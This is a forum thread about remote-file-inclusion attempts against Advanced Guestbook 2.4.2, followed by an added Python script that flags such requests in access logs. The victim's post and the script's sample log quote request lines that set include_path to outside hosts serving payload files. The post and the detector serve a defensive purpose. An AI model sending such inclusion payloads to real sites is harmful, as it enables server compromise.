vulnerability
gang-gang
Newbie

Joined: 16/09/2009 07:22:53
Messages: 2
Location: Australia
Offline

A while ago I downloaded Advanced Guestbook 2.4.2 to my website. For some time now, AWSTATS has shown a lot of visits to the admin.php, index.php and image.php pages of the guestbook, mainly by robots. It also indicates a lot of referrals to my site from strange sites (usually on-line gaming or similar) which have no logical relationship with my site (genealogy and trekking). I checked out site visitors via CPANEL and found addresses of the type below:
/xfile1/admin.php?include_path=http://randycute.com/zfxid1.txt??
/xfile1/admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt??

/xfile/admin.php is the admin page of Advanced Guestbook 2.4.2 on my site - the rest seems to be a redirect to a different site - which looks a bit suspect to me. I certainly have not placed any such pathways.

Can you tell me what could be happening? Is there a vulnerability in Advanced Guestbook that is being exploited by dodgy sites? If there is a problem, has it been resolved in a later version of Advanced Guestbook?

Thanks for any help.
Carbonize
Master

Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
Offline

They are trying to use an exploit that existed a few years ago.

Carbonize
I am not the maker of the Advanced Guestbook

get Lazarus
gang-gang
Newbie

Joined: 16/09/2009 07:22:53
Messages: 2
Location: Australia
Offline

Thanks Carbonize,

I guess that I should upgrade to 2.4.4 or Lazarus to make the site a bit more secure.
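
The requests quoted in the first post pass a remote URL as the value of a query parameter. As an added example (not part of this thread and not Advanced Guestbook code), the following Python script flags such requests in a web server access log. The log entries are constructed in Apache combined format around the two request paths quoted above, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Request line of an Apache/NCSA access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute remote URL
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def remote_url_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    query = target.partition("?")[2]
    hits = []
    # parse_qsl percent-decodes, so an encoded value is matched as well
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Return [(client, path, name, value)] for every flagged request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        target = match.group(1)
        client = line.split(" ", 1)[0]
        path = target.partition("?")[0]
        for name, value in remote_url_params(target):
            findings.append((client, path, name, value))
    return findings


# Constructed sample entries; only the first two request targets come from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Sep/2009:07:01:12 +1000] "GET /xfile1/admin.php?include_path=http://randycute.com/zfxid1.txt?? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [16/Sep/2009:07:03:40 +1000] "GET /xfile1/admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.12 - - [16/Sep/2009:07:05:02 +1000] "GET /xfile1/admin.php?include_path=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.20 - - [16/Sep/2009:07:09:55 +1000] "GET /xfile1/index.php?entry=0 HTTP/1.1" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for client, path, name, value in scan(SAMPLE_LOG):
        print(f"{client} {path} {name}={value}")
```

A match records that the request was made; whether it had any effect depends on the guestbook version installed.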